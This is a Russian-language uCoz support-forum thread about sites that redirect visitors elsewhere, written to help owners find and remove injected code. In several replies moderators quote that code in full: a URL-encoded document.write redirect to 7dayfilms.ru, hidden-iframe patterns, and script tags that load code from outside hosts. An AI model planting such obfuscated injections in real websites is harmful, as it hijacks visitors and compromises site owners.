Модератор форума: Yuri_G |
Сообщество uCoz Мастерская uCoz Безопасность сайта При заходе на сайт перекидывает на другой |
При заходе на сайт перекидывает на другой |
Описание проблемы: При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом Причины возникновения: 1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки Если вы ставите к себе на сайт скрипт подобного вида Code <script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script> где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность 2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой Code <iframe src="http://levyisite.ru" width="1" height="1"></iframe> Где levyisite.ru - это адрес чужого сайта а Code width="1" height="1" Code width="0" height="0" Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов 3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность 4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем |
_VITALIK_, Спасибо! Почистим.
|
TeacherMorozova,
Цитата А может дело в этих двух виджетах. Они висят у нас второй год-жалко удалять - вписываются в дизайн. |
Здравствуйте. При входе на сайт biserun.ucoz.com автоматически перекидывает на сайт http://7dayfilms.ru. Помогите пожалуйста, на знаю что делать. И на сайте http://menzo.ucoz.ru пропала вся реклама и изменился вид сайта... Я изменений не вносила
Сообщение отредактировал Nata5990 - Среда, 08 Апр 2015, 14:58:44
|
Nata5990, пу - дизайн - управление дизайном - блок статистика - удалить скрипт
Код <script type="text/javascript"> document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%4A%61%76%61%53%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65% 78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%20%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%37%64%61%79%66%69%6C%6D%73%2E%72%75%2F%22 %20%3C%2F%73%63%72%69%70%74%3E')); </script> |
При заходе на мой сайт http://school2tomash.at.ua/ перебрасывает на http://7dayfilms.ru/. Как устранить эту проблему?
|
Kudytin, у вас установлен сторонний скрипт в блоке Статистика
Код <script type="text/javascript"> document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%4A%61%76%61%53%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65% 78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%20%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%37%64%61%79%66%69%6C%6D%73%2E%72%75%2F%22 %20%3C%2F%73%63%72%69%70%74%3E')); </script> удалите его. Панель управления - Дизайн - Управление дизайном (шаблоны) - Первый контейнер Смените пароль от панели управления сайтом и никому, никогда и ни при каких обстоятельствах не сообщайте его!!! |
http://nvorc.my1.ru перебрасывает на http://7dayfilms.ru сразу при входе на сайт, в скринах этот сайт не виден.
Добавлено (09 Апр 2015, 19:05:40) |
Roman2751, из формы входа удалите скрипты
Код <script>izs=22171;tm="0017378";z=1;</script><script language="JavaScript" type="text/JavaScript" charset="windows-1251" src="http://watrz.com/j100.php?w=1"></script> <script>ids=22171;tm="0017378";</script><script language="JavaScript" type="text/JavaScript" charset="windows-1251" src="http://xaogi.com/j66.php"></script> <script>izs=22171;tm="0017378";</script><script language="JavaScript" type="text/JavaScript" charset="windows-1251" src="http://piroji.com/j65.php"></script> Пароль: должен состоять из 9 или более символов (цифр, заглавных или строчных латинских букв, знаков препинания, кроме пробела); не должен состоять только из цифр; не должен основываться на персональных данных (имени пользователя, ФИО, e-mail и т.п); не должен основываться на часто используемых словах («window», «book», «parol» и т.п.); не должен содержать простых и предсказуемых последовательностей («qwerty», «1234» и т.п). |
вот моя форма входа пользователей
Код <script type="text/javascript"> $(document).ready(function(){ $('#uidLogButton div:last a').click(); };); </script> <?if($PAGE_ID$="login")?><div style="width:180px;"><?endif?> <table border="0" cellspacing="1" cellpadding="0" width="100%"> <?if($ERROR$)?><td colspan="2" style="color:red;text-align:center;">$ERROR$</td><?endif?> <tr><td width="20%" nowrap="nowrap">E-mail:$UID_ICON$</td><td><input class="loginField" type="text" name="user" value="" size="20" style="width:100%;" maxlength="50"/></td></tr> <tr><td>Пароль:</td><td><input class="loginField" type="password" name="password" size="20" style="width:100%" maxlength="15"/></td></tr> </table> <table border="0" cellspacing="1" cellpadding="0" width="100%"> <tr><td nowrap><input id="rem$PAGE_ID$" type="checkbox" name="rem" value="1" checked="checked"/><label for="rem$PAGE_ID$">запомнить</label> <?if($PAGE_ID$="login" && $HIDDEN_ALLOWED$)?><br /><input id="hid$PAGE_ID$" type="checkbox" name="hidden" value="1" /><label for="hid$PAGE_ID$">скрытый</label><?endif?></td><td align="right" valign="top"><input class="loginButton" name="sbm" type="submit" value="Вход"/></td></tr> <tr><td colspan="2"><div style="font-size:7pt;text-align:center;"><a href="$REMINDER_LINK$">Забыл пароль</a> | <a href="$REGISTER_LINK$">Регистрация</a></div></td></tr> </table> <?if($PAGE_ID$="login")?></div><?endif?> сдесь нет кода которого вы указали |
Roman2751, первый контейнер, block2. И смените пароли, большую часть настроек вы можете осуществлять через Вебтоп.
|
Paha3250, удалите код из верхней части сайта
Код <script src="http://101widgets.com/w1419002224-fcc004pro&154&115"></script> Также удалите JS-код из блока статистики Код <script type="text/javascript"> document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%4A%61%76%61%53%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65% 78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%20%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%37%64%61%79%66%69%6C%6D%73%2E%72%75%2F%22 %20%3C%2F%73%63%72%69%70%74%3E')); </script> |
Также удалите JS-код из блока статистики Код <script type="text/javascript"> document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%4A%61%76%61%53%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65% 78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%20%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%37%64%61%79%66%69%6C%6D%73%2E%72%75%2F%22 %20%3C%2F%73%63%72%69%70%74%3E')); </script> Paha3250, днв, где-то новый скрипт статистики выложили? Сообщение отредактировал $Tiny$ - Понедельник, 13 Апр 2015, 14:27:20
|
| |||